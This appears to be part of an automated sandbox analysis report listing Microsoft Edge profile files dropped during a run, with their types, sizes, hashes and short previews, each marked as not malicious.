                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7760088126912533
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:llBtlEuWk8rlnHpywFBDBjDMEF4gLuumwf7ImWP9K+A7iqxxOJO7LFsjBDvqhsD0:LBtiuWkKcwF11DM/FAf4ADsO7L0rqqD0
                                                                                                                                                                                                                                                                                              MD5:05A4622364DF7AA77CC521602EFCBFBD
                                                                                                                                                                                                                                                                                              SHA1:BEF53821EA5B40A9E83A8488E21464FDAC9EDAC5
                                                                                                                                                                                                                                                                                              SHA-256:AAC65945A223FB9E4AC5647676AA603E8703EAEF7716723976AC99007A9D4C55
                                                                                                                                                                                                                                                                                              SHA-512:7472DA768111899CF9C61707F80AEE706CE6CC33163A8A4FD3C524920B03305F7507B82DEF18E7A1A7965B879487F54B86E2744436F31951DEB540DB4C1D4820
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5671885608363025
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:AY0J0uWPZhfhs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbOCZcrwGpGtu/:AY0J0uWPZhfhsu1ja6TZVzt8
                                                                                                                                                                                                                                                                                              MD5:A37A898DCDCE7E529487FA0F803F884C
                                                                                                                                                                                                                                                                                              SHA1:53C2A0240040C351E220CABCE8903FCD02B9100C
                                                                                                                                                                                                                                                                                              SHA-256:6245ADF58AD55F8704391A9D6031629CFDD704B91B814A197F066D012F0EC426
                                                                                                                                                                                                                                                                                              SHA-512:D838D97270DD90F2409F4499525121D6BCCA679295E2B9F729DF91752046F78754D89261D0889E56B0C5B4D54792D195AA3F8062CCF3EFB73F333F8D40A0AEB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):213
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                                                                                              MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                                                                                              SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                                                                                              SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                                                                                              SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02157589352817
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LWIq2P923oH+TcwtrQMxIFUt8OLWZmw+OLF7kwO923oH+TcwtrQMFLJ:7yIv4YebCFUt8Oi/+OJ5LYebtJ
                                                                                                                                                                                                                                                                                              MD5:E9E3CE919416A712AF9FFDB58B327330
                                                                                                                                                                                                                                                                                              SHA1:28FB147071DB733C8EFD2CE1AEEA124BB2173913
                                                                                                                                                                                                                                                                                              SHA-256:DD63AE33022DEAA49C1B80C0AACD1E23667E03E0A185B975465DF790B0B9A81C
                                                                                                                                                                                                                                                                                              SHA-512:6CF0AF838327840D758C374D1F7216EC0AF7327F39437BA03E539FF9B69247E2EA4CC2FF0C2C2481961D0B2EF0D4A4130E7F720504E7D27D00875F508528DC56
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.333 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:40:20.337 1e20 Recovering log #3.2024/12/10-12:40:20.345 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2222
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4481313131484175
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3tjpUBz8oqg/1dS71mgFEwQgoSh+pSh+5qGHDarzSQy:3uOrA+zd
                                                                                                                                                                                                                                                                                              MD5:CC69EB9695FD991F7FF82B09D180E90C
                                                                                                                                                                                                                                                                                              SHA1:22119635FB607FF2192A67FA3B6CB02F50AFC93D
                                                                                                                                                                                                                                                                                              SHA-256:496710E8A8A35C5B9DD15390D811E2EF7269B2D369C8F73B2D39CAD46E082922
                                                                                                                                                                                                                                                                                              SHA-512:6336E58D5DFD48E0A49F1094FC65F599C794E29CA8E6DD569D659894CC92C402CCA82166CF9C70E6CE506A66B7149550478484A75F22C0EF3108A4B7A8E682B2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SNSS..........q..............q......"...q..............q..........q..........q..........q....!.....q..................................q...q1..,......q$...b266fa59_d01b_4236_a661_aab23c151faa......q..........q....V.]...........q......q....................5..0......q&...{98952893-68FF-4A5D-A164-705C709ED3DB}........q.............q..........q....!.....q..................................q...q1..,......q$...911d35d2_581a_4099_a900_eecb7693c14d......q..........q...... ...........q..............q....9...file:///C:/Users/user/AppData/Local/Temp/1262855704.pdf...............!.......................................................................................................h.]..(..i.]..(..H.......`.......................................................................z...9...f.i.l.e.:./././.C.:./.U.s.e.r.s./.a.l.f.o.n.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.1.2.6.2.8.5.5.7.0.4...p.d.f.......................................8.......0.......8.................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.06846550240484
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L865EQ+q2P923oH+Tcwt7Uh2ghZIFUt8OL865EgZmw+OL865EQVkwO923oH+Tcz:7A3v4YebIhHh2FUt8OAa/+OAm5LYebIT
                                                                                                                                                                                                                                                                                              MD5:B0978C9F3F108BBFA59AE288AB20C02E
                                                                                                                                                                                                                                                                                              SHA1:1C9B174D61C73FDFE8EC4F383B9B9DE3BFFCE139
                                                                                                                                                                                                                                                                                              SHA-256:11490964E0BA0F63AD15E65455FE7CC63EC93CA1E5CF09EDF675D300B228F8B8
                                                                                                                                                                                                                                                                                              SHA-512:22175750F3C51FD292D0F7E33BE3F7508C4D98E5570F7C5E6745BF88F8A036132CABB5F93976768353941321C4AEACA82D0E4DA1325EA86139669C34B70D1E23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.140 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:40:19.140 1d08 Recovering log #3.2024/12/10-12:40:19.140 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):434
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.157623930668104
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7nOv4YebvqBQFUt8OpX/+OV5LYebvqBvJ:7M4YebvZg8OprHLYebvk
                                                                                                                                                                                                                                                                                              MD5:B282E77CCCEBAD73AD3934C371C57102
                                                                                                                                                                                                                                                                                              SHA1:BB4E7BA8EC56CA3C9599E42CEC8351BEF50ECA6A
                                                                                                                                                                                                                                                                                              SHA-256:13728326B94262A0B11106276B8F1C160384763224FD4189EB7156A684ED7D11
                                                                                                                                                                                                                                                                                              SHA-512:8E2089CD94349D55227B9390F96F12DEE67C55260912C269A79512FF45ADF1CE28C8C23BF06319CF29E01A46F6CB4A4E6AB29792D263B6A1EA464099C8188E04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.558 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:20.602 1e20 Recovering log #3.2024/12/10-12:40:20.608 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):144
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                              MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                              SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                              SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                              SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):144
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                              MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                              SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                              SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                              SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1768589194879135
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7v/Uzv4YebvqBZFUt8OvrZ/+OvX5LYebvqBaJ:73o4Yebvyg8OBxLYebvL
                                                                                                                                                                                                                                                                                              MD5:B7A919359ACB2C6BF9CDC2975E13015E
                                                                                                                                                                                                                                                                                              SHA1:1643AFA8050FBDCAD03768B1C090680E4DAB7023
                                                                                                                                                                                                                                                                                              SHA-256:985BCEB95C8ED6F0E2F85D6BA6CF4014FA8C4A73A4099B98321409DDE3C770CF
                                                                                                                                                                                                                                                                                              SHA-512:B363A34718B42A24616ABE2220DABA696E501467A1A887F852A8CE1E0351ED48B994C2B191687B530DB08C7043063D2C7A9DDA2914A5A7BE2F2497DC7196E1CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:37.820 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:40:37.831 1e20 Recovering log #3.2024/12/10-12:40:37.840 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1768589194879135
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7v/Uzv4YebvqBZFUt8OvrZ/+OvX5LYebvqBaJ:73o4Yebvyg8OBxLYebvL
                                                                                                                                                                                                                                                                                              MD5:B7A919359ACB2C6BF9CDC2975E13015E
                                                                                                                                                                                                                                                                                              SHA1:1643AFA8050FBDCAD03768B1C090680E4DAB7023
                                                                                                                                                                                                                                                                                              SHA-256:985BCEB95C8ED6F0E2F85D6BA6CF4014FA8C4A73A4099B98321409DDE3C770CF
                                                                                                                                                                                                                                                                                              SHA-512:B363A34718B42A24616ABE2220DABA696E501467A1A887F852A8CE1E0351ED48B994C2B191687B530DB08C7043063D2C7A9DDA2914A5A7BE2F2497DC7196E1CF
                                                                                                                                                                                                                                                                                              Malicious:false
